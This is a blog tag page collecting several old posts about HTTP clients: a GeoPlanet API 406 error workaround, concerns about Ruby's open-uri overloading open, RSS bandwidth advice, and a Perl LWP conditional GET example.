Blog posts tagged "http"

WOE “GeoPlanet”: HTTP/1.1 406 Not Acceptable

November 19th, 2008

not simple polygons

Just putting a note here for the next time I’m working with the Yahoo! GeoPlanet APIs.

The conudrum: a HTTP GET on a given resource (http://where.yahooapis.com/v1/place/23511846?appid=$appid) works in the browser, and works with wget from the command line, but fails from within PHP with a 406 Not Acceptable.

The solution, append format=XML to the resource URL, because the service is blowing out its brains on a missing Accepts header.

And that folks is the magic of REST.

update 2008/12/04: quick scan of my referer logs suggests this is biting folks using lwp-simple and wget particularly hard.

Ruby, HTTP, and open-uri

April 12th, 2005

Ruby’s obvious HTTP client library is Net::HTTP (‘net/http’), however it feels a little bit awkward to use and lacks nice features like following redirects. If you’re coming from LWP you’ll be disappointed.

However there is a nice wrapper, open-uri that makes it simple to add custom headers, provides loop aware redirect following, etc. And it provides a super slick drop in replacement for the Kernel#open method, so that you can open either a local file, or a remote URL….

Danger Will Robinson! Danger

At this point, alarm bells are going off in the heads’ of the PHP programmers in the audience, who are thinking to themselves,

“Wow, someone went to the trouble of making Ruby act PHP-like! Down to replicating one of the most commonly exploited security holes!”

Sincerest forms of flattery aside, that seems like a really bad idea. Admittedly you have to explicitly require 'open-uri' in order to activate the feature, howev er as the best of the Ruby HTTP clients (I’ve found to date) that seems like a decent bet in many web apps, and once you’ve done that all future calls to open can be hijacked to download remote files.

Now, this being Ruby, there is probably some clever solution involving de-aliasing the open method which makes all these problems go away. Still this seems like an opportunity for the PHP community, with its near infinite experience with having web apps exploited, to teach the Ruby community something. Overloading your core file open semantic to transparently open remote resources is a bad idea, full stop.

Tagged: Uncategorized , , , , ,

RSS Bandwidth Strategies

December 21st, 2004

Much concern, hand wringing and advice on RSS bandwidth issues lately. (see Regular Sucking Schedule, and HowTo RSS Feed State). Here’s some more.

skipHours (and co.), ttl, and mod_syndication are all considered harmful. They’re all under specified, highly ambiguous, poorly supported, poorly implemented, and move logic into the file which should be (and is) in the protocol. Rule of thumb, if your bandwidth saving mechanism is in your feed, it’s a mistake. They promise false hopes of salvation, ignore them.

HTTP Will Save You

Rather look to:
  • Conditional GET, learn it, live it, love it. Trivial to support, you have my permission to ban clients which don’t support it.
  • GZIP encoding, the obvious solution to bandwidth concerns is to swap a little CPU (and the magic of HTTP caching really does minimize it), for a whole lot of bandwidth savings. Been looking for a reason to upgrade to Apache 2.0? How about moddeflate is included by default and is more stable then the arcane (and nomadic) modgzip (which was a beacon a in the darkness in its day)
  • RFC 3229 aka HTTP deltas, and modspeedyfeed (reason #2 for upgrading Apache 2.0). Wave of the future, next puncture in the equilibrium, Sam has some notes: Varg ETag, Syndication with RFC3229, RFC3229 enabled, modspeedyfeed.

It’s All About Apache2 and HTTP/1.1

This post also does double duty as the my weighing in on Apache2 vs PHP mini- controversy

Fat Media

Obviously none of this will save you from the bandwidth concern of podcasting (or videoblogging!). I’m willing concede that those concerns are beyond the scope of basic HTTP, and point your attention to BitTorrent.

Tagged: Uncategorized , , ,

Like Rsync for HTTP

December 8th, 2003

RFC 3229 (HTTP deltas via steve) needs a “for Hackers” article in the style of the classic Conditional GET for RSS hackers

Tagged: Uncategorized ,

Aggregators and Prior Art

July 22nd, 2003

Mark reminds us aggregator are HTTP clients, and there’s a lot of prior art on how HTTP clients are supposed to work.

I struggle with how much of this Magpie should be aware of. Its not really an aggregator, but people use it as such. The response code (and in CVS the full headers) are made available to clients, but for the people using it as a simple drop in to their website, Magpie moves from being a library to the client.

A difficult balance, too complicated for my exhausted brain.

Tagged: Uncategorized , ,

Conditional GET with LWP & Perl

March 1st, 2003

I was arguing recently that implementing a conditional GET with LWP is trivial and there was no reason why someone wouldn’t support it. I assumed there must be a dozen examples of how to do this. Afterall O’reilly has “open sourced” their original LWP book, there is an LWP cookbook, and reams of POD.

No Such Luck

Well a quick search didn’t turn up anything. A more concerted one might have but it was easier to write this example then keep searching. If you’re looking for more general info on Conditional GETs try Charles Miller’s HTTP Conditional Get for RSS Hackers. If you’re looking for an implementation in PHP, you might look in rss_fetch of my RSS parser/aggregator Magpie.

Conditional GET

The basic idea is, when you request a file you remember the ETag and Last-Modified HTTP headers, passing them along with your next request as If-None-Match and If-Last-Modified. If the file has changed then you’ll get the content as normal, if the file hasn’t changed you’ll get a ‘304 Not Modified’ header.

This is something of a toy example, but I try to be as correct as possible with it. Noteable in its absence is doing anything with the file you’ve fetched. (for example parsing and storing an RSS feed) Also I use a simple file to store ETag and Last-Modified, you might want to use a different backend.
See the Code

Example Code


use LWP::UserAgent;
use HTTP::Request;

my $url = "http://localhost/rss/laughingmeme.rdf";
my $cache_file = 'cache';
my %headers;

if ( -e $cache_file ) {
    open (CACHE, "< $cache_file") or die "Couldn't open: $!";
    %headers = (
        If_None_Match => <CACHE>,
        If_Last_Modified => <CACHE>
    );
    close CACHE;
}

my $ua = new LWP::UserAgent();
$ua->agent("Conditionally Enabled v0.1");

my $req = HTTP::Request->new( GET => $url );
$req->header(%headers);

my $res = $ua->request($req);
if ($res->is_success) {
    print "new!\n";
    # save ETag & Last-Modified
    open (CACHE, "> $cache_file") or die "Couldn't open: $!";
    print CACHE $res->header('ETag'), "\n";
    print CACHE $res->header('Last-Modified'), "\n";
    close CACHE;
}
elsif ( $res->code() eq '304' ) {
    print "not modified, go to cache\n";
    # do logic for RSS not modified
}
else {
    print "fooey! somthing went wrong\n";
}

Tagged: Uncategorized , , , , ,

There Has Got To Be A Better Way

October 23rd, 2002

So I’ve got this nifty little RSS parser doohickey, Magpie. In the name of lowering the curve, and weaning PHP programmers away from their previously available hackish solutions I tried to make it as simple to use, and “PHP-like” as possible. Meaning that fetching the remote feed, and parsing it, and caching it have been rolled into one convenient step. Now that HTTP conditional GETs are all the rage, I’m adding them to Magpie. (I’ve had an ugly implementation lying around for a while, but its not even worth check into CVS)

PHP as Web Client

But how the hell does one do web automation with PHP? I feel like no one has ever taken this problem on before in PHP. Or at least no one on the web is talking about it somewhere I can find it. How does one get at If-Modified-Since, Last-Modified, and Etag? Where is LWP or urllib2 for PHP?

You can get at the response headers from fopen() from the array $httpresponseheader which is magically instaniated behind the scenes. (because PHP does that kind of thing) I wonder if I stuffed some vaules into an array named $httprequestheader, would it work? (No, it doesn’t)

PHP Cookbook

The PHP Cookbook has a tantalizing Chapter 11 entitled “Web Automation”, with rule 11.1 being “Fetching URLs with GET”, and rule 11.4 “Fetching URLs with Headers”, sounding just about perfect. And its supposed to come out this November, could only by 9 days, but I’m impatient. I’m going to stop by Quantum today, to see if they have one of their looks-like-someone-snuck-it-out-the-back-door-and-photo-copied-it O’Reilly specials.

Rolling Your Own

So barring the deliverance from on high by O’Reilly it appears that the only way I’m going to get these features right now is to roll my own using fsockopen() and hand-packed headers. Have I mentioned that PHP is sadly deficient in tools?

update, 10/25: So the word on the street is “just use sockets”, the answer rolls off the mailing lists and newsgroups, with the polish and weariness of a frequently asked question. No one suggested it, but I’m also intrigued by Snoopy, the web client class for PHP. I think I’ll start by rolling my own, and loop back to Snoopy when I have time to do benchmarks.

fyi: ended up using Snoopy, very happy with it.

The Impenetrable Importance of Culture

For me the hardest part in working with languages I’m less familiar with (Python, and PHP for example) rather then those I’m more comfortable with (Perl or Java) is not syntax questions, it’s culture. For all of Perl’s much vaunted “There is More Then One Way To Do It”, I know the proper way to do things, the proper tool to reach for, and if I don’t I have ways of finding out, largely through internal calculation based on my understanding of the Perl reputation landscape. It is that information which is opaque to me, especially in PHP where the vast number of practioners are novices.

Tagged: Uncategorized , ,